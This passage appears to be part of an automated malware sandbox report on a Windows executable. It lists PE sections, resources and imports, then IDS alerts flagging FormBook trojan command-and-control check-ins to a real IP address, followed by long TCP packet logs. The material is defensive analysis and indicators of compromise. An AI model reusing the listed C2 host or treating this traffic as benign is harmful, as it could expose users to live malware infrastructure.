                                                                            .idata  0x67000          0x2676        0x2800    False     0.31298828125    data       5.07577903587  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                            .tls    0x6a000          0x34          0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                            .rdata  0x6b000          0x18          0x200     False     0.05078125       data       0.20448815744  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc  0x6c000          0x6570        0x6600    False     0.642080269608   data       6.68603494627  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            .rsrc   0x73000          0x40600       0x40600   False     0.313121966019   data       5.92007118283  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            Name RVA Size Type Language Country
                                                                            RT_CURSOR 0x74224 0x134 data English United States
                                                                            RT_CURSOR 0x74358 0x134 data English United States
                                                                            RT_CURSOR 0x7448c 0x134 data English United States
                                                                            RT_CURSOR 0x745c0 0x134 data English United States
                                                                            RT_CURSOR 0x746f4 0x134 data English United States
                                                                            RT_CURSOR 0x74828 0x134 data English United States
                                                                            RT_CURSOR 0x7495c 0x134 data English United States
                                                                            RT_BITMAP 0x74a90 0x1d0 data English United States
                                                                            RT_BITMAP 0x74c60 0x1e4 data English United States
                                                                            RT_BITMAP 0x74e44 0x1d0 data English United States
                                                                            RT_BITMAP 0x75014 0x1d0 data English United States
                                                                            RT_BITMAP 0x751e4 0x1d0 data English United States
                                                                            RT_BITMAP 0x753b4 0x1d0 data English United States
                                                                            RT_BITMAP 0x75584 0x1d0 data English United States
                                                                            RT_BITMAP 0x75754 0x1d0 data English United States
                                                                            RT_BITMAP 0x75924 0x1d0 data English United States
                                                                            RT_BITMAP 0x75af4 0x1d0 data English United States
                                                                            RT_BITMAP 0x75cc4 0x128 data English United States
                                                                            RT_BITMAP 0x75dec 0x128 data English United States
                                                                            RT_BITMAP 0x75f14 0x128 data English United States
                                                                            RT_BITMAP 0x7603c 0xe8 data English United States
                                                                            RT_BITMAP 0x76124 0x128 data English United States
                                                                            RT_BITMAP 0x7624c 0x128 data English United States
                                                                            RT_BITMAP 0x76374 0xd0 data English United States
                                                                            RT_BITMAP 0x76444 0x128 data English United States
                                                                            RT_BITMAP 0x7656c 0x128 data English United States
                                                                            RT_BITMAP 0x76694 0x128 data English United States
                                                                            RT_BITMAP 0x767bc 0x128 data English United States
                                                                            RT_BITMAP 0x768e4 0x128 data English United States
                                                                            RT_BITMAP 0x76a0c 0xe8 data English United States
                                                                            RT_BITMAP 0x76af4 0x128 data English United States
                                                                            RT_BITMAP 0x76c1c 0x128 data English United States
                                                                            RT_BITMAP 0x76d44 0xd0 data English United States
                                                                            RT_BITMAP 0x76e14 0x128 data English United States
                                                                            RT_BITMAP 0x76f3c 0x128 data English United States
                                                                            RT_BITMAP 0x77064 0x128 data English United States
                                                                            RT_BITMAP 0x7718c 0x128 data English United States
                                                                            RT_BITMAP 0x772b4 0x128 data English United States
                                                                            RT_BITMAP 0x773dc 0xe8 data English United States
                                                                            RT_BITMAP 0x774c4 0x128 data English United States
                                                                            RT_BITMAP 0x775ec 0x128 data English United States
                                                                            RT_BITMAP 0x77714 0xd0 data English United States
                                                                            RT_BITMAP 0x777e4 0x128 data English United States
                                                                            RT_BITMAP 0x7790c 0x128 data English United States
                                                                            RT_BITMAP 0x77a34 0xe8 GLS_BINARY_LSB_FIRST English United States
                                                                            RT_ICON 0x77b1c 0x10a8 data English United States
                                                                            RT_ICON 0x78bc4 0x25a8 data English United States
                                                                            RT_DIALOG 0x7b16c 0x52 data
                                                                            RT_DIALOG 0x7b1c0 0x52 data
                                                                            RT_STRING 0x7b214 0xec data
                                                                            RT_STRING 0x7b300 0x304 data
                                                                            RT_STRING 0x7b604 0x164 data
                                                                            RT_STRING 0x7b768 0xc8 data
                                                                            RT_STRING 0x7b830 0x134 data
                                                                            RT_STRING 0x7b964 0x478 data
                                                                            RT_STRING 0x7bddc 0x374 data
                                                                            RT_STRING 0x7c150 0x370 data
                                                                            RT_STRING 0x7c4c0 0x3c8 data
                                                                            RT_STRING 0x7c888 0xd4 data
                                                                            RT_STRING 0x7c95c 0xa4 data
                                                                            RT_STRING 0x7ca00 0x2a0 data
                                                                            RT_STRING 0x7cca0 0x458 data
                                                                            RT_STRING 0x7d0f8 0x38c data
                                                                            RT_STRING 0x7d484 0x2b4 data
                                                                            RT_RCDATA 0x7d738 0x10 data
                                                                            RT_RCDATA 0x7d748 0x344 data
                                                                            RT_RCDATA 0x7da8c 0x35986 PC bitmap, Windows 3.x format, 611 x 165 x 8 English United States
                                                                            RT_GROUP_CURSOR 0xb3414 0x14 Lotus unknown worksheet or configuration, revision 0x1 English United States
                                                                            RT_GROUP_CURSOR 0xb3428 0x14 Lotus unknown worksheet or configuration, revision 0x1 English United States
                                                                            RT_GROUP_CURSOR 0xb343c 0x14 Lotus unknown worksheet or configuration, revision 0x1 English United States
                                                                            RT_GROUP_CURSOR 0xb3450 0x14 Lotus unknown worksheet or configuration, revision 0x1 English United States
                                                                            RT_GROUP_CURSOR 0xb3464 0x14 Lotus unknown worksheet or configuration, revision 0x1 English United States
                                                                            RT_GROUP_CURSOR 0xb3478 0x14 Lotus unknown worksheet or configuration, revision 0x1 English United States
                                                                            RT_GROUP_CURSOR 0xb348c 0x14 Lotus unknown worksheet or configuration, revision 0x1 English United States
                                                                            RT_GROUP_ICON 0xb34a0 0x22 data English United States

                                                                            Imports

                                                                            DLL Import
                                                                            oleaut32.dll SysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                            advapi32.dll RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                            user32.dll GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                            kernel32.dll GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                            kernel32.dll TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                            user32.dll CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharNextW, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                            gdi32.dll UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                                                            version.dll VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                            kernel32.dll lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                            advapi32.dll RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                            oleaut32.dll GetErrorInfo, SysFreeString
                                                                            ole32.dll CoUninitialize, CoInitialize
                                                                            kernel32.dll Sleep
                                                                            oleaut32.dll SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                            comctl32.dll _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                            advapi32 AuditFree
                                                                            uRL InetIsOffline

                                                                            Possible Origin

                                                                            Language of compilation system  Country where language is spoken
                                                                            English                         United States

                                                                            Network Behavior

                                                                            Snort IDS Alerts

                                                                            Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP       Dest IP
                                                                            12/01/21-16:26:27.398004  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49843        80         192.168.2.3     156.235.157.134
                                                                            12/01/21-16:26:27.398004  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49843        80         192.168.2.3     156.235.157.134
                                                                            12/01/21-16:26:27.398004  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49843        80         192.168.2.3     156.235.157.134
                                                                            12/01/21-16:26:55.888065  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49847      15.197.142.173  192.168.2.3

                                                                            TCP Packets

                                                                            Dec 1, 2021 16:22:56.224428892 CET 443 49750 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.224458933 CET 49750 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.224483967 CET 443 49750 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.224487066 CET 49750 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.224493980 CET 443 49750 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.224525928 CET 49750 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.224540949 CET 443 49750 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.224555016 CET 49750 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.224560976 CET 443 49750 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.224586964 CET 49750 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.224591970 CET 443 49750 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.224618912 CET 49750 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.224625111 CET 443 49750 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.224653006 CET 49750 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.224657059 CET 443 49750 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.224683046 CET 49750 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.224688053 CET 443 49750 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.224714994 CET 49750 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.224720955 CET 443 49750 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.224745989 CET 49750 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.224750996 CET 443 49750 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.224762917 CET 443 49750 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.224783897 CET 49750 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.224822044 CET 49750 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.224827051 CET 443 49750 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.225027084 CET 49750 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.230272055 CET 49750 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.230338097 CET 49750 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.252341032 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.252384901 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.252484083 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.259957075 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.259984016 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.301635981 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.301779032 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.304454088 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.304467916 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.309356928 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.309386015 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.365770102 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.365859985 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.365878105 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.365909100 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.365945101 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.365951061 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.365973949 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.365992069 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.365995884 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366036892 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366038084 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366055012 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366081953 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366101980 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366142035 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366185904 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366204977 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366261959 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366262913 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366276026 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366329908 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366336107 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366381884 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366385937 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366400003 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366414070 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366426945 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366450071 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366466045 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366470098 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366478920 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366508961 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366524935 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366537094 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366543055 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366569996 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366580009 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366590023 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366600990 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366632938 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366633892 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366647005 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366651058 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366677999 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366695881 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366700888 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366744995 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366745949 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366758108 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366807938 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366813898 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366846085 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366851091 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366858006 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366885900 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366887093 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366898060 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366930962 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366950035 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.366954088 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.366995096 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.367000103 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.367043972 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.367048979 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.367084026 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.367094040 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.367101908 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.367130041 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.367151976 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.367156982 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.367196083 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.367201090 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.367216110 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.367243052 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.367265940 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.367269993 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.367310047 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.367316008 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.367327929 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.367355108 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.367378950 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.367383003 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.367393970 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.367424965 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.367429018 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.367450953 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.367468119 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.383831978 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.383987904 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.384002924 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.384028912 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.384064913 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.384069920 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.384083033 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.384116888 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.384125948 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.384149075 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.384177923 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.384201050 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.384219885 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.384289980 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.384290934 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.384309053 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.384339094 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.384365082 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.384368896 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.384386063 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.384422064 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.384439945 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.384457111 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.384516954 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.384526968 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.384545088 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.384577036 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.384602070 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.384612083 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.384629965 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.384663105 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.384686947 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.384691954 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.384707928 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.384743929 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.384767056 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.400717020 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.400799990 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.400831938 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.400842905 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.400870085 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.400907040 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.400913000 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.400943041 CET 443 49751 162.159.129.233 192.168.2.3
